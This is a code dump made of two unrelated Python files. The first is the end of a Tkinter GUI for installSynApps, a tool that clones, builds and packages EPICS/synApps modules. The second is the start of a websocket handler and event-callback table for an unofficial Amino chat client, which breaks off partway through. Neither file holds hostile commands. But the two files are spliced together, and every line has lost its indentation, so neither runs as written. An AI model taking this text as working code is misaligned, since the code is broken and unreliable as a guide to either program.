self.loadingLabel.grid(row = 0, column = 2, pady = 0, columnspan = 2)
# config panel
self.configPanel = ScrolledText.ScrolledText(frame, width = '50', height = '20')
self.configPanel.grid(row = 5, column = 0, padx = 15, pady = 15, columnspan = 2, rowspan = 2)
# log panel + initialize text
self.log = ScrolledText.ScrolledText(frame, height = '40', width = '70')
self.log.grid(row = 1, column = 2, padx = 15, pady = 15, columnspan = 6, rowspan = 6)
self.writeToLog(self.initLogText())
# default configure path
self.configure_path = 'configure'
self.configure_path = os.path.abspath(self.configure_path)
self.valid_install = False
self.deps_found = True
self.install_loaded = False
self.metacontroller = ViewModel.meta_pref_control.MetaDataController()
if 'configure_path' in self.metacontroller.metadata.keys():
self.configure_path = self.metacontroller.metadata['configure_path']
if self.configure_path != 'configure':
self.install_loaded = True
self.writeToLog('Loading configure directory saved in location {}\n'.format(self.configure_path))
self.metacontroller.metadata['isa_version'] = installSynApps.__version__
self.metacontroller.metadata['platform'] = platform
self.metacontroller.metadata['last_used'] = '{}'.format(datetime.datetime.now())
# installSynApps options, initialzie + read default configure files
self.parser = IO.config_parser.ConfigParser(self.configure_path)
self.install_config, message = self.parser.parse_install_config(allow_illegal=True)
if message is not None:
self.valid_install = False
self.showWarningMessage('Warning', 'Illegal Install Config: {}'.format(message), force_popup=True)
else:
self.valid_install = True
# Threads for async operation
self.thread = threading.Thread()
self.loadingIconThread = threading.Thread()
# installSynApps drivers
self.writer = IO.config_writer.ConfigWriter(self.install_config)
self.cloner = Driver.clone_driver.CloneDriver(self.install_config)
self.updater = Driver.update_config_driver.UpdateConfigDriver(self.configure_path, self.install_config)
self.builder = Driver.build_driver.BuildDriver(self.install_config, 0)
self.packager = Driver.packager_driver.Packager(self.install_config)
if 'package_location' in self.metacontroller.metadata.keys():
self.packager.output_location = self.metacontroller.metadata['package_location']
self.writeToLog('Loaded package output location: {}\n'.format(self.packager.output_location))
self.package_output_filename = None
if 'package_output_filename' in self.metacontroller.metadata.keys():
self.package_output_filename = self.metacontroller.metadata['package_output_filename']
self.autogenerator = IO.script_generator.ScriptGenerator(self.install_config)
self.recheckDeps()
if self.install_config is not None:
self.updateConfigPanel()
else:
self.showErrorMessage('Load error', 'Error loading default install config... {}'.format(message), force_popup=True)
# -------------------------- Helper functions ----------------------------------
def loadingLoop(self):
"""
Simple function for playing animation when main process thread is executing
"""
icons = ['\\', '|', '/', '-']
icon_counter = 0
while self.thread.is_alive():
self.loadingLabel.config(text = 'Process Thread Status: {}'.format(icons[icon_counter]))
time.sleep(0.25)
icon_counter = icon_counter + 1
if icon_counter == len(icons):
icon_counter = 0
self.loadingLabel.config(text = 'Process Thread Status: Done.')
def initLogText(self):
"""Function that initializes log text
"""
return installSynApps.get_welcome_text() + '\n'
def resetLog(self):
""" Function that resets the log """
self.log.delete('1.0', END)
self.writeToLog(self.initLogText())
def updateConfigPanel(self):
"""
Function that refreshes the config panel contents if a new InstallConfiguration is loaded
"""
self.configPanel.delete('1.0', END)
self.writeToLog("Writing Install Configuration to info panel...\n")
if self.install_config is not None:
self.writeToConfigPanel("Currently Loaded Install Configuration:\n\n")
self.writeToConfigPanel("Install Location: {}\n\n".format(self.install_config.install_location))
self.writeToConfigPanel("Modules to auto-build:\n-------------------------------\n")
for module in self.install_config.get_module_list():
if module.build == "YES":
self.writeToConfigPanel("Name: {},\t\t\tVersion: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules with detected custom build scripts:\n----------------------------\n")
for module in self.install_config.get_module_list():
if module.custom_build_script_path is not None:
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules to clone but not build:\n----------------------------\n")
for module in self.install_config.get_module_list():
if module.build == "NO" and module.clone == "YES":
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules to package:\n-----------------------------\n")
for module in self.install_config.get_module_list():
if module.package == "YES":
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToLog("Done.\n")
else:
self.showErrorMessage("Config Error", "ERROR - Could not display Install Configuration: not loaded correctly")
def updateAllRefs(self, install_config):
""" Function that updates all references to install config and configure path """
self.install_config = install_config
self.writer.install_config = self.install_config
self.cloner.install_config = self.install_config
self.updater.install_config = self.install_config
self.updater.path_to_configure = self.configure_path
self.updater.config_injector.install_config = self.install_config
self.builder.install_config = self.install_config
self.packager.install_config = self.install_config
self.autogenerator.install_config = self.install_config
def recheckDeps(self):
""" Wrapper function for checking for installed dependancies """
self.writeToLog('Checking for installed dependancies...\n')
inPath, missing = self.builder.check_dependencies_in_path()
if not inPath:
self.showErrorMessage('Error', 'ERROR- Could not find {} in system path.'.format(missing), force_popup=True)
self.deps_found = False
else:
self.deps_found = True
if not self.packager.found_distro:
self.writeToLog('Distro python package not found.\nTarball names will be generic and not distribution specific.\n')
self.writeToLog('To install distro, use pip: pip install distro\n')
self.writeToLog('Done.\n')
def close_cleanup(self):
""" Function that asks user if he/she wants to close, and cleans up threads """
if self.thread.is_alive():
self.showWarningMessage('Warning', 'Qutting while process is running may result in invalid installation!', force_popup=True)
if messagebox.askokcancel('Quit', 'Do you want to quit?'):
self.master.destroy()
IO.logger.close_logger()
self.metacontroller.save_metadata()
# -------------------------- Functions for writing/displaying information ----------------------------------
def writeToLog(self, text):
""" Function that writes to log """
self.log.insert(INSERT, text)
self.log.see(END)
def writeToConfigPanel(self, text):
""" Function that writes to the config panel """
self.configPanel.insert(INSERT, text)
def showErrorMessage(self, title, text, force_popup = False):
""" Function that displays error popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showerror(title, text)
self.writeToLog(text + "\n")
def showWarningMessage(self, title, text, force_popup = False):
""" Function that displays warning popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showwarning(title, text)
self.writeToLog(text + "\n")
def showMessage(self, title, text, force_popup = False):
""" Function that displays info popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showinfo(title, text)
self.writeToLog(text + '\n')
# ----------------------- Version Sync Functions -----------------------------
def syncTags(self):
""" Function that automatically updates all of the github tags for the install configuration git modules """
global WITH_PYGITHUB
if not WITH_PYGITHUB:
self.showErrorMessage('Error', 'ERROR - PyGithub not found. Install with pip install pygithub, and restart', force_popup=True)
else:
user = simpledialog.askstring('Please enter your github username.', 'Username')
if user is None or len(user) == 0:
return
passwd = simpledialog.askstring('Please enter your github password.', 'Password', show='*')
if passwd is None or len(passwd) == 0:
return
if user is not None and passwd is not None:
if not self.thread.is_alive():
self.thread = threading.Thread(target=lambda : self.syncTagsProcess(user, passwd))
self.loadingIconThread = threading.Thread(target=self.loadingLoop)
self.thread.start()
self.loadingIconThread.start()
else:
self.showErrorMessage('Error', 'ERROR - Process thread already running', force_popup=True)
def syncTagsProcess(self, user, passwd):
"""
Function meant to synchronize tags for each github based module.
Parameters
----------
user : str
github username
passwd : str
github password
"""
installSynApps.sync_github_tags(user, passwd, self.install_config)
self.updateAllRefs(self.install_config)
self.updateConfigPanel()
# ----------------------- Loading/saving Functions -----------------------------
def newConfig(self, template_type):
"""
Will load a new blank config and allow user to edit/save it
"""
template_filename = 'NEW_CONFIG_ALL'
if template_type == 'AD':
template_filename = 'NEW_CONFIG_AD'
elif template_type == 'Motor':
template_filename = 'NEW_CONFIG_MOTOR'
self.writeToLog("Opening new install config dialog...\n")
temp = simpledialog.askstring('New Install Config', 'Please enter a new desired install location.', parent = self.master)
if temp is None:
self.showWarningMessage('Warning', 'Operation cancelled')
else:
self.writeToLog("Trying to load new default config with install location {}...\n".format(temp))
old_config = self.configure_path
self.configure_path = 'resources'
self.parser.configure_path = self.configure_path
loaded_install_config, message = self.parser.parse_install_config(config_filename=template_filename, force_location=temp, allow_illegal=True)
if message is not None:
self.valid_install = False
else:
self.valid_install = True
if loaded_install_config is None:
self.showErrorMessage('Error', 'ERROR - {}.'.format(message), force_popup=True)
self.parser.configure_path = old_config
self.configure_path = old_config
elif not self.valid_install:
self.showWarningMessage('Warning', 'WARNING - {}.'.format(message), force_popup=True)
self.updateAllRefs(loaded_install_config)
self.updateConfigPanel()
else:
self.updateAllRefs(loaded_install_config)
self.updateConfigPanel()
self.install_loaded = False
def loadConfig(self):
"""
Function that opens file dialog asking for configure directory,
then if it is valid, loads it into an InstallConfiguration object,
and updates the config panel.
"""
self.writeToLog("Opening load install config file dialog...\n")
temp = self.configure_path
self.configure_path = filedialog.askdirectory(initialdir = '.')
if len(self.configure_path) == 0:
self.writeToLog('Operation cancelled.\n')
self.configure_path = temp
return
valid = True
if not os.path.exists(self.configure_path + "/INSTALL_CONFIG"):
valid = False
self.showErrorMessage("Config Error", "ERROR - No INSTALL_CONFIG file found in selected directory.")
elif not os.path.exists(self.configure_path + "/injectionFiles") or not os.path.exists(self.configure_path + "/macroFiles"):
self.showWarningMessage('Load Warning', "WARNING - Could not find injection files or macro files.")
if not valid:
self.configure_path = temp
return
self.writeToLog('Loaded configure directory at {}.\n'.format(self.configure_path))
self.parser.configure_path = self.configure_path
self.metacontroller.metadata['configure_path'] = self.configure_path
self.install_config, message = self.parser.parse_install_config(allow_illegal=True)
if message is not None:
self.valid_install = False
self.showWarningMessage('Warning', 'WARNING - {}.'.format(message), force_popup=True)
else:
self.valid_install = True
if self.install_config is not None:
self.updateConfigPanel()
else:
self.showErrorMessage('Load error', 'Error loading install config... {}'.format(message), force_popup=True)
self.updateAllRefs(self.install_config)
self.install_loaded = True
if self.configure_path == 'configure':
self.install_loaded = False
def saveConfig(self):
""" Function that saves an existing config, or opens save as if it was not previously saved. """
self.writeToLog("Saving...\n")
if not self.install_loaded:
self.saveConfigAs()
else:
self.saveConfigAs(force_loc = self.configure_path)
def saveConfigAs(self, force_loc = None):
""" Function that opens a save as Dialog for saving currently loaded confguration """
if self.install_config is None:
self.showErrorMessage('Save error', 'No loaded install config to save.', force_popup=True)
return
if force_loc is None:
dirpath = filedialog.asksaveasfilename(initialdir = '.')
if len(dirpath) < 1:
self.writeToLog('Operation Cancelled.\n')
return
self.writeToLog('Creating save directory...\n')
else:
ans = messagebox.askyesno('Confirm', 'Do you wish to overwrite existing install config with new changes?')
if ans is None:
return
elif not ans:
return
dirpath = force_loc
shutil.rmtree(os.path.join(dirpath, 'injectionFiles'))
shutil.rmtree(os.path.join(dirpath, 'macroFiles'))
os.remove(os.path.join(dirpath, 'INSTALL_CONFIG'))
wrote, message = self.writer.write_install_config(filepath=dirpath)
if not wrote:
self.showErrorMessage('Write Error', 'Error saving install config: {}'.format(message), force_popup=True)
else:
if self.install_loaded:
try:
shutil.copytree(self.configure_path + '/customBuildScripts', dirpath + '/customBuildScripts')
except:
pass
self.configure_path = dirpath
self.install_loaded = True
self.updateAllRefs(self.install_config)
self.metacontroller.metadata['configure_path'] = self.configure_path
self.writeToLog('Saved currently loaded install configuration to {}.\n'.format(dirpath))
def saveLog(self, saveDir = None):
"""
Function that saves the contents of the log to a file.
Parameters
----------
saveDir = None
if None, opens file dialog to select save location, otherwise, saves in saveDir passed in
"""
location = saveDir
if location == None:
location = filedialog.askdirectory(initialdir = '.')
if len(location) == 0:
return
if location is not None and not os.path.exists(location):
self.showErrorMessage('Save Error', 'ERROR - Save directory does not exist')
return
time = datetime.datetime.now()
log_file = open(location + "/installSynApps_log_" + time.strftime("%Y_%m_%d_%H_%M_%S"), "w")
log_file.write(self.log.get('1.0', END))
log_file.close()
def selectPackageDestination(self):
""" Function that asks the user to select an output destination for the created tarball """
package_output = filedialog.askdirectory(initialdir = '.', title = 'Select output package directory')
if len(package_output) < 1:
self.writeToLog('Operation Cancelled.\n')
else:
if os.path.exists(package_output):
self.packager.output_location = package_output
self.metacontroller.metadata['package_location'] = self.packager.output_location
self.writeToLog('New package output location set to: {}\n'.format(package_output))
else:
self.showErrorMessage('Path Error', 'ERROR - Output path does not exist.')
def setOutputPackageName(self):
""" Function that sets the output package name """
self.writeToLog('Setting output package name...\n')
package_name = simpledialog.askstring('Enter an output name', 'Output Package Name - typically OS/Distro.')
if package_name is not None and len(package_name) > 0:
self.packager.OS = package_name
self.writeToLog('Done.\n')
else:
self.writeToLog('Operation Cancelled.\n')
def getInitIOCs(self):
""" Function that gets initIOCs from github. """
self.writeToLog('Fetching the initIOC script...\n')
out = subprocess.Popen(['git', 'clone', 'https://github.com/epicsNSLS2-deploy/initIOC'])
self.writeToLog('Done.\n')
def launchInitIOCs(self):
""" Function that launches the GUI version of initIOCs """
if os.path.exists('./initIOC/initIOCs.py'):
self.writeToLog('Launching initIOC GUI...\n')
current = os.getcwd()
os.chdir('initIOC')
if platform == 'win32':
p = subprocess.Popen(['py', 'initIOCs.py', '-g'])
else:
p = subprocess.Popen(['./initIOCs.py', '-g'])
os.chdir(current)
self.writeToLog('Done.\n')
else:
self.showErrorMessage('Error', 'ERROR - Could not find initIOCs. Run the Get initIOCs command first.')
#---------------------------- Editing Functions --------------------------------
def openEditWindow(self, edit_window_str):
""" Function that opens up an Edit Config window """
window = None
if self.install_config is None:
self.showErrorMessage('Edit Error', 'Error - no loaded install config', force_popup=True)
return
if edit_window_str == 'edit_config':
window = ViewModel.edit_install_screen.EditConfigGUI(self, self.install_config)
elif edit_window_str == 'add_module':
window = ViewModel.add_module_screen.AddModuleGUI(self, self.install_config)
elif edit_window_str == 'edit_single_mod':
window = ViewModel.edit_individual_module.EditSingleModuleGUI(self, self.install_config)
elif edit_window_str == 'edit_injectors':
window = ViewModel.edit_injector_screen.EditInjectorGUI(self, self.install_config)
elif edit_window_str == 'edit_build_flags':
window = ViewModel.edit_macro_screen.EditMacroGUI(self, self.install_config)
elif edit_window_str == 'add_custom_build_script':
window = ViewModel.add_custom_build_screen.AddCustomBuildScriptGUI(self, self.install_config)
elif edit_window_str == 'edit_dependency_script':
window = ViewModel.edit_dependency_script.EditDependencyScriptGUI(self, self.install_config)
else:
self.showErrorMessage('Open Error', 'ERROR - Illegal Edit Window selection')
if window is None:
self.showErrorMessage('Open Error', 'ERROR - Unable to open Edit Window')
def editCoreCount(self):
""" Function that prompts the user to enter a core count """
if self.singleCore.get():
self.showMessage('Message', 'Currently single core mode is enabled, please toggle off to set core count', force_popup=True)
return
cores = simpledialog.askinteger('Set Core Count', 'Please enter a core count, or 0 to use all cores', parent = self.master)
if cores is None:
self.writeToLog('Operation Cancelled.\n')
return
if cores < 0 or cores > 16:
self.showErrorMessage('Core Count Error', 'ERROR - You have entered an illegal core count, try again.', force_popup=True)
current_count = self.builder.threads
new_count = cores
if self.builder.threads == 0:
current_count = 'Max core count'
if cores == 0:
new_count = 'Max core count'
self.writeToLog('New core count to use: {}, old core count to use: {}\n'.format(new_count, current_count))
self.builder.threads = cores
def setSingleCore(self, *args):
""" Function that sets the single core option if toggle is pressed """
self.builder.one_thread = self.singleCore.get()
#--------------------------------- Help/Documentation Functions -----------------------------
def loadHelp(self):
""" Simple function that displays a help message """
helpMessage = "---------------------------------------------\n"
helpMessage = helpMessage + "Welcome to the installSynApps GUI.\nThis program is designed to help you rapidly build EPICS and synApps.\n\n"
helpMessage = helpMessage + "To begin, take a look at the panel on the bottom left.\nThis is the currently loaded install configuration.\n"
helpMessage = helpMessage + "Note the modules listed to be auto-built and their versions.\n\nTo edit these, check the Edit -> Edit Config tab in the menubar.\n"
helpMessage = helpMessage + "A second window should open and allow you to edit the version\nof each module, as well as to select modules to clone/build/package.\n"
helpMessage = helpMessage + "This window also allows you to edit the install location.\n\n"
helpMessage = helpMessage + "Once you have edited the configuration to your specifications,\nyou may press the autorun button on the side, to trigger the build.\n"
helpMessage = helpMessage + "For more detailed documentation on installSynApps, please\nvisit the documentation online."
self.showMessage("Help", helpMessage)
def printDependencies(self):
""" Prints some information regarding required dependencies for installSynApps """
self.writeToLog('---------------------------------------------------\n')
self.writeToLog('Dependencies required for installSynApps:\n')
self.writeToLog(' * git\n * wget\n * tar\n * make\n * perl\n\n')
self.writeToLog('Also required are a C/C++ compiler:\n')
self.writeToLog(' * Linux - gcc/g++ (install with package manager)\n')
self.writeToLog(' * Windows - MSVC/MSVC++ (install with Visual Studio 2015+)\n\n')
self.writeToLog('Additional optional python3 modules used, install with pip:\n')
self.writeToLog(' * distro\n')
self.writeToLog(' * pygithub\n\n')
self.writeToLog('All dependencies must be in system path during build time.\n')
self.writeToLog('---------------------------------------------------\n')
def showAbout(self):
""" Simple function that shows about message """
self.showMessage('About', self.initLogText())
def printLoadedConfigInfo(self):
""" Simple function that prints all info about a loaded configuration """
if self.install_config is None:
self.showErrorMessage('Error', 'ERROR - No loaded install config found', force_popup=True)
self.writeToLog(self.install_config.get_printable_string())
def depScriptHelp(self):
""" Function that displays help message for adding dependancy script """
self.writeToLog('Use the Edit -> Edit Custom Build Scripts menu to add/remove\n')
self.writeToLog('custom build scripts for each module.\nOn windows they will be saved as')
self.writeToLog('.bat files, on linux as .sh files,\nand they will be run from the module')
self.writeToLog(' root directory.\nIf no custom script is found, the module will just be\n')
self.writeToLog('built with make. If you have a sudo call in your script,\nnote that you')
self.writeToLog('will need to enter it in the terminal to proceed.\n')
def printPathInfo(self):
""" Function that prints a series of paths that are currently loaded. """
self.writeToLog('-----------------------------------------\n')
self.writeToLog('Install Location: {}\n'.format(self.install_config.install_location))
self.writeToLog('Install config directory: {}\n'.format(self.configure_path))
self.writeToLog('Package output path: {}\n'.format(self.packager.output_location))
#--------------------------------- Build Process Functions ------------------------------------------#
# #
# Note that each of the build process functions has a wrapper that quickly returns, after starting #
# thread for running the process itself in the background. #
#----------------------------------------------------------------------------------------------------#
def initBuildProcess(self, action):
"""Event function that starts a thread on the appropriate build process function
Parameters
----------
action : str
a string key on the async action to perform
"""
if self.generateLogFile.get() and IO.logger._LOG_FILE is None:
IO.logger.initialize_logger()
if self.showCommands.get() != IO.logger._PRINT_COMMANDS:
IO.logger.toggle_command_printing()
if self.showDebug.get() != IO.logger._DEBUG:
IO.logger.toggle_debug_logging()
if self.install_config is None:
self.showErrorMessage("Start Error", "ERROR - No loaded install config.", force_popup=True)
elif not self.valid_install:
self.showErrorMessage("Start Error", "ERROR - Loaded install config not valid.", force_popup=True)
elif not self.deps_found:
self.showErrorMessage("Start Error", "ERROR - Missing dependancies detected. See Help -> Required Dependencies.", force_popup=True)
elif not self.thread.is_alive():
if action == 'autorun':
self.thread = threading.Thread(target=self.autorunProcess)
elif action == 'install-dependencies':
self.thread = threading.Thread(target=self.installDependenciesProcess)
elif action == 'clone':
self.thread = threading.Thread(target=self.cloneConfigProcess)
elif action == 'update':
self.thread = threading.Thread(target=self.updateConfigProcess)
elif action == 'inject':
self.thread = threading.Thread(target=self.injectFilesProcess)
elif action == 'build':
self.thread = threading.Thread(target=self.buildConfigProcess)
elif action == 'package':
self.thread = threading.Thread(target=self.packageConfigProcess)
elif action == 'moveunpack':
self.thread = threading.Thread(target=self.copyAndUnpackProcess)
else:
self.showErrorMessage('Start Error', 'ERROR - Illegal init process call', force_popup=True)
self.loadingIconThread = threading.Thread(target=self.loadingLoop)
self.thread.start()
self.loadingIconThread.start()
else:
self.showErrorMessage("Start Error", "ERROR - Process thread is already active.")
def installDependenciesProcess(self):
""" Function that calls a dependency script if required """
self.writeToLog('Running dependency script...\n')
if platform == 'win32':
if os.path.exists(self.configure_path + '/dependencyInstall.bat'):
self.builder.acquire_dependecies(self.configure_path + '/dependencyInstall.bat')
else:
self.writeToLog('No dependency script found.\n')
else:
if os.path.exists(self.configure_path + '/dependencyInstall.sh'):
self.builder.acquire_dependecies(self.configure_path + '/dependencyInstall.sh')
else:
self.writeToLog('No dependency script found.\n')
self.writeToLog('Done.\n')
def cloneConfigProcess(self):
""" Function that clones all specified modules """
failed = self.cloner.clone_and_checkout()
if len(failed) > 0:
for elem in failed:
self.writeToLog('Module {} was not cloned successfully.\n'.format(elem))
return -1
return 0
def updateConfigProcess(self):
""" Function that updates RELEASE and configuration files """
self.writeToLog('----------------------------\n')
self.writeToLog('Updating all RELEASE and configuration files...')
self.updater.run_update_config(with_injection=False)
dep_errors = self.updater.perform_dependency_valid_check()
for error in dep_errors:
self.writeToLog('{}\n'.format(error))
self.writeToLog('Reordering module build order to account for intra-module dependencies...\n')
self.updater.perform_fix_out_of_order_dependencies()
self.writeToLog('Done.\n')
return 0
def injectFilesProcess(self):
""" Function that injects settings into configuration files """
self.writeToLog('Starting file injection process.\n')
self.updater.perform_injection_updates()
self.writeToLog('Done.\n')
return 0
def buildConfigProcess(self):
""" Function that builds all specified modules """
status = 0
self.writeToLog('-----------------------------------\n')
self.writeToLog('Beginning build process...\n')
status, failed = self.builder.build_all()
if status != 0:
for module in failed:
self.writeToLog('Failed building module {}\n'.format(module))
self.showErrorMessage('Build Error', 'Some modules failed to build.')
else:
self.writeToLog('Auto-Build completed successfully.')
self.writeToLog('Done.\n')
self.writeToLog('Autogenerating install/uninstall scripts...\n')
self.autogenerator.initialize_dir()
self.autogenerator.generate_install()
self.autogenerator.generate_uninstall()
self.writeToLog('Autogenerating README file in {}...\n'.format(self.install_config.install_location))
self.autogenerator.generate_readme()
self.writeToLog('Done.\n')
return status
def autorunProcess(self):
""" Function that performs all other processes sequentially """
self.showMessage('Start Autorun', 'Start Autorun - Deps -> Clone -> Checkout -> Update -> Build -> Generate')
if self.installDep.get():
self.installDependenciesProcess()
else:
self.writeToLog("Auto install dependencies toggled off.\n")
current_status = self.cloneConfigProcess()
if current_status < 0:
self.showErrorMessage('Clone Error', 'ERROR - Cloning error occurred, aborting...')
else:
current_status = self.updateConfigProcess()
if current_status < 0:
self.showErrorMessage('Update Error', 'ERROR - Update error occurred, aborting...')
else:
current_status = self.injectFilesProcess()
if current_status < 0:
self.showErrorMessage('File Inject Error', 'ERROR - Unable to inject files, check Permissions...')
else:
current_status = self.buildConfigProcess()
if current_status < 0:
self.showErrorMessage('Build Error', 'ERROR - Build error occurred, aborting...')
self.showMessage('Alert', 'You may wish to save a copy of this log file for later use.')
self.writeToLog('To generate a bundle from the build, select the Package option.\n')
self.writeToLog('Autorun completed.\n')
def packageConfigProcess(self):
""" Function that packages the specified modules into a tarball """
self.writeToLog('Starting packaging...\n')
self.package_output_filename = self.packager.create_bundle_name()
output = self.packager.create_package(self.package_output_filename, flat_format=self.binariesFlatToggle.get())
self.package_output_filename = self.package_output_filename + '.tgz'
self.metacontroller.metadata['package_output_filename'] = self.package_output_filename
if output != 0:
self.showErrorMessage('Package Error', 'ERROR - Was unable to package areaDetector successfully. Aborting.', force_popup=True)
else:
self.writeToLog('Done.\n')
def copyAndUnpackProcess(self):
""" Function that allows user to move their packaged tarball and unpack it. """
self.writeToLog('Starting move + unpack operation...\n')
if self.package_output_filename is None:
self.showErrorMessage('Error', 'ERROR - No tarball package has yet been created.')
elif not os.path.exists(self.packager.output_location + '/' + self.package_output_filename):
self.showErrorMessage('Error', 'ERROR - tarball was generated but could not be found. Possibly moved.')
else:
target = filedialog.askdirectory(initialdir='.')
if target is None:
self.writeToLog('Operation cancelled.\n')
else:
self.writeToLog('Moving and unpacking to: {}\n'.format(target))
shutil.move(os.path.join(self.packager.output_location, self.package_output_filename), os.path.join(target, self.package_output_filename))
current = os.getcwd()
os.chdir(target)
subprocess.call(['tar', '-xzf', self.package_output_filename])
os.remove(self.package_output_filename)
os.chdir(current)
self.writeToLog('Done.')
# ---------------- Start the GUI ---------------
root = Tk()
root.title("installSynApps")
try:
root.iconbitmap('docs/assets/isaIcon.ico')
except:
pass
root.resizable(False, False)
gui = InstallSynAppsGUI(root)
root.mainloop()
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
# websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.debug = debug
self.active = True
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
self.socket_stop = False
self.socketDelay = 0
self.socket_trace = socket_trace
self.socketDelayFetch = 120 # Reconnects every 120 seconds.
def run_socket(self):
threading.Thread(target=self.reconnect_handler).start()
websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
if self.debug:
print("[socket][on_close] reconnect is True, Opening Socket")
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
contextlib.suppress(self.socket.sock.pong(data))
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
def __init__(self, client):
self.client = client
self.handlers = {}
self.methods = {
304: self._resolve_chat_action_start,
306: self._resolve_chat_action_end,
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"1:0": self.on_strike_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"50:0": self.TYPE_USER_SHARE_EXURL,
"51:0": self.TYPE_USER_SHARE_USER,
"52:0": self.on_voice_chat_not_answered,
"53:0": self.on_voice_chat_not_cancelled,
"54:0": self.on_voice_chat_not_declined,
"55:0": self.on_video_chat_not_answered,
"56:0": self.on_video_chat_not_cancelled,
"57:0": self.on_video_chat_not_declined,
"58:0": self.on_avatar_chat_not_answered,
"59:0": self.on_avatar_chat_not_cancelled,
"60:0": self.on_avatar_chat_not_declined,
"100:0": self.on_delete_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite,
"104:0": self.on_chat_background_changed,
"105:0": self.on_chat_title_changed,
"106:0": self.on_chat_icon_changed,
"107:0": self.on_voice_chat_start,
"108:0": self.on_video_chat_start,
"109:0": self.on_avatar_chat_start,
"110:0": self.on_voice_chat_end,
"111:0": self.on_video_chat_end,
"112:0": self.on_avatar_chat_end,
"113:0": self.on_chat_content_changed,
"114:0": self.on_screen_room_start,
"115:0": self.on_screen_room_end,
"116:0": self.on_chat_host_transfered,
"117:0": self.on_text_message_force_removed,
"118:0": self.on_chat_removed_message,
"119:0": self.on_text_message_removed_by_admin,
"120:0": self.on_chat_tip,
"121:0": self.on_chat_pin_announcement,
"122:0": self.on_voice_chat_permission_open_to_everyone,
"123:0": self.on_voice_chat_permission_invited_and_requested,
"124:0": self.on_voice_chat_permission_invite_only,
"125:0": self.on_chat_view_only_enabled,
"126:0": self.on_chat_view_only_disabled,
"127:0": self.on_chat_unpin_announcement,
"128:0": self.on_chat_tipping_enabled,
"129:0": self.on_chat_tipping_disabled,
"65281:0": self.on_timestamp_message,
"65282:0": self.on_welcome_message,
"65283:0": self.on_invite_message
}
self.chat_actions_start = {
"Typing": self.on_user_typing_start,
}
self.chat_actions_end = {
"Typing": self.on_user_typing_end,
}
def _resolve_chat_message(self, data):
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def _resolve_chat_action_start(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_start.get(key, self.default)(data)
def _resolve_chat_action_end(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_end.get(key, self.default)(data)
def resolve(self, data):
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def call(self, type, data):
if type in self.handlers:
for handler in self.handlers[type]:
handler(data)
def event(self, type):
def registerHandler(handler):
if type in self.handlers:
self.handlers[type].append(handler)
else:
self.handlers[type] = [handler]
return handler
return registerHandler
def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
